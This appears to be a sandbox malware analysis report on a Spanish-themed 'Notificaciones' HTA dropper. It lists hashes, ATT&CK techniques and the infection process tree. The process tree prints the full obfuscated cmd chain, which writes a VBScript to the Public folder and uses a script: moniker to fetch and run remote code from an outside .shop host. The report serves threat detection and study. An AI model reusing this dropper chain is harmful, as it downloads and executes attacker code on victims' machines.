a08868f1a8ed16d22d8d9cedca4ff215d4243ce1b965a4108b48fb92e251ea96

Analysis

max time kernel
153s
max time network
278s
platform
windows10-2004_x64
resource
win10v2004-20230915-es
resource tags

arch:x64arch:x86image:win10v2004-20230915-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
11/10/2023, 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Notificaciones_11102023_ff6y2TM.hta
Size

43KB
MD5

13dabc0b7f1d85bf2d23521bd1bde8ef
SHA1

4c7199570a0379ed28b36387c3b6aa3d98b1942f
SHA256

a08868f1a8ed16d22d8d9cedca4ff215d4243ce1b965a4108b48fb92e251ea96
SHA512

1fc39284ac013e9d4b3656d091de7e9396b7b0b12d854dce608570d8251b4349db7c3a1397469828e3f0ad6e298d0a03eba4262158dd5f82cf362928603dab01
SSDEEP

768:CYQAOZpYKvz3L/bQO3+kVn/Sk8LZesgZQAOZpYKvz3L/bQO3+kVn/Sk8LZesgw:CYQAO4ELr+wSkTLZQAO4ELr+wSkTLw

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
18	1240	WScript.exe
24	1240	WScript.exe
26	1240	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	mshta.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 3816 wrote to memory of 3916	3816	mshta.exe	86
PID 3816 wrote to memory of 3916	3816	mshta.exe	86
PID 3816 wrote to memory of 3916	3816	mshta.exe	86
PID 3916 wrote to memory of 1432	3916	cmd.exe	89
PID 3916 wrote to memory of 1432	3916	cmd.exe	89
PID 3916 wrote to memory of 1432	3916	cmd.exe	89
PID 3916 wrote to memory of 1404	3916	cmd.exe	90
PID 3916 wrote to memory of 1404	3916	cmd.exe	90
PID 3916 wrote to memory of 1404	3916	cmd.exe	90
PID 3916 wrote to memory of 3732	3916	cmd.exe	92
PID 3916 wrote to memory of 3732	3916	cmd.exe	92
PID 3916 wrote to memory of 3732	3916	cmd.exe	92
PID 3916 wrote to memory of 3160	3916	cmd.exe	91
PID 3916 wrote to memory of 3160	3916	cmd.exe	91
PID 3916 wrote to memory of 3160	3916	cmd.exe	91
PID 3916 wrote to memory of 4356	3916	cmd.exe	93
PID 3916 wrote to memory of 4356	3916	cmd.exe	93
PID 3916 wrote to memory of 4356	3916	cmd.exe	93
PID 4356 wrote to memory of 1240	4356	cmd.exe	94
PID 4356 wrote to memory of 1240	4356	cmd.exe	94
PID 4356 wrote to memory of 1240	4356	cmd.exe	94

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Notificaciones_11102023_ff6y2TM.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k echo|set /p=^"YWn2=".":kfMxnG="i":sfbc38="g":rp2d5Fu=":":GetO^">C:\\Users\\Public\\tFb.vbs&echo|set /p=^"bject("sCr"+kfMxnG+"pt"+rp2d5Fu+"hT"+"Tps"+rp2d5Fu+"//booshome"+YWn2+"transportsd"+YWn2+"shop//"+sfbc38+"1")^">>C:\\Users\\Public\\tFb.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tFb.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="YWn2=".":kfMxnG="i":sfbc38="g":rp2d5Fu=":":GetO" 1>C:\\Users\\Public\\tFb.vbs"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+kfMxnG+"pt"+rp2d5Fu+"hT"+"Tps"+rp2d5Fu+"//booshome"+YWn2+"transportsd"+YWn2+"shop//"+sfbc38+"1")" 1>>C:\\Users\\Public\\tFb.vbs"
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo"
    3⤵
    PID:3732
- - \??\c:\windows\SysWOW64\cmd.exe
    c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tFb.vbs
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4356
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\tFb.vbs"
      4⤵
      Blocklisted process makes network request
      PID:1240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\tFb.vbs

Filesize
155B

MD5
c4b31b6d826c8f06e96e912168d2c6a9

SHA1
814aacc3e032988c54f2306c68dac6f018b103a9

SHA256
9adf4f2b429276044cdd28477b9837d420e9c773dab3c18b2e8f2409cd77bea0

SHA512
a7979fe34b40f1648770375f9268a6d0d55775d691a72bd37a3af0b3d3a59b1ff632ab821a548d33bac9e423a442a3f89897fbb0a9ca55fd67a1ae47d5687fe6

Download Submit
C:\Users\Public\tFb.vbs

Filesize
155B

MD5
c4b31b6d826c8f06e96e912168d2c6a9

SHA1
814aacc3e032988c54f2306c68dac6f018b103a9

SHA256
9adf4f2b429276044cdd28477b9837d420e9c773dab3c18b2e8f2409cd77bea0

SHA512
a7979fe34b40f1648770375f9268a6d0d55775d691a72bd37a3af0b3d3a59b1ff632ab821a548d33bac9e423a442a3f89897fbb0a9ca55fd67a1ae47d5687fe6

Download Submit